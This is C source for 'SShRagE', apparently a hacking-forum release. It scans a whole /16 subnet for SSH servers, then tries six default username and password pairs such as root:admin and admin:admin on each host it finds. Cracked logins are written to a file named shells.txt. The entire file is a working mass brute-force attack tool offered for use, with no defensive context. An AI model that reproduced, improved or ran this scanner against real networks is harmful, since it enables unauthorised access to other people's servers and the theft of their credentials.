SShRagE bY PwNz-iNk A.K.A PwNztAr

Code:
/*
 *   Prwning ssh range scanner for weak passwd :P You need libssh
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <termios.h>
#include <sys/select.h>
#include <sys/time.h>
#include <signal.h>
#include <errno.h>
#include <libssh/libssh.h>
#include <libssh/sftp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <time.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>


#define TIME     5

FILE *fp;
FILE *pf;
int flag;
int sockett, a, b, c, d;
struct hostent *he;
int MAXCHILDS;
int porta = 22;
int childs = 0;
char host[BUFSIZ];
char banner[1024];

int sock3(int porta, char host[BUFSIZ])
{
  int lola;
  char log[512];
  char buf[1024];
  struct sockaddr_in sin;

  void timeout() {
    close (sockett);
  }

  signal (SIGALRM, (void *) timeout);
  alarm (TIME);
  he = gethostbyname (host);
  lola = inet_addr (host);

  sockett = socket (AF_INET, SOCK_STREAM, 0);
  sin.sin_family = AF_INET;
  sin.sin_port = htons (porta);
  bcopy (he->h_addr, (char *) &sin.sin_addr, he->h_length);

   if (connect (sockett, (struct sockaddr *) &sin, sizeof (sin)) == 0) {
      read(sockett, buf, sizeof(buf));
      if (strstr(buf, banner)) {
         printf("[+] Found ip %s running %s", host, buf);
         sshforce(host);
      }
      close (sockett);
      return;
   }
}


int child()
{

  if (childs >= MAXCHILDS)
    {
      (void) wait (NULL);
      --childs;
    }

  switch (fork ())
    {
    case 0:
      sock3 (porta, host);
      exit (0);
      break;
    case -1:
      printf ("[-] Error creating child processes\n");
      exit (-1);
      break;
    default:
      childs++;
      break;
    }

}

void checkauth(char *user,char *password,char *host) {
   char warn[125]="";
   SSH_SESSION *session;
   SSH_OPTIONS *options;
   int argc=1;
   char *argv[]={"none"};

   alarm(10);
   options=ssh_getopt(&argc,argv);
   options_set_username(options,user);
   options_set_host(options,host);
   session=ssh_connect(options);
   if(!session) return ;

   if(ssh_userauth_password(session,NULL,password) != SSH_AUTH_SUCCESS) {
      ssh_disconnect(session);
      return;
   }

   printf("[+] Found shell at ip %s with username %s and password %s\n",host , user,password);
   FILE *vuln = fopen ("shells.txt", "a+");
   fprintf (vuln, "%s:%s@%s\n", user, password, host );
   fclose (vuln);
   return;

}

int sshforce(char *iptoforce) {
   printf("[+] Now checking ip %s\n", iptoforce);
   char buff[1024];
   int numforks;
   int maxf=10;

   if (!(fork())) {
    //child
      checkauth("root","admin",iptoforce);
      checkauth("root","password",iptoforce);
      checkauth("root","login",iptoforce);
      checkauth("guest","guest",iptoforce);
      checkauth("admin","admin",iptoforce);
      checkauth("admin","password",iptoforce);
      printf("[+] Done checking %s for weak passwords\n", iptoforce);
      exit(0);
   }
   else {
    //parent
      numforks++;
      if (numforks > maxf)
         for (numforks; numforks > maxf; numforks--)
            wait(NULL);
   }

}


int main (int argc, char *argv[]) {

   if(argc != 3) {
      printf("..:: SSHRAGE by PwNz-iNk A.K.A PwNztAr ::..\n");
      printf("Usage %s <subnet> <threads>\n", argv[0]);
      printf("Example %s 192.168 50\n", argv[0]);
      return 0;
   }

   strcpy(banner, "SSH");
   MAXCHILDS= atoi(argv[2]);
   char *subnet = argv[1];
   int i = 0;
   int j;
   printf("[+] Start scanning...\n");
   while(i<255) {
      for(j=1;j<255;j++) {
         sprintf(host,"%s.%d.%d",subnet,i,j);
         child();
      }
   i++;
   }
   printf("[+] Done\n");
}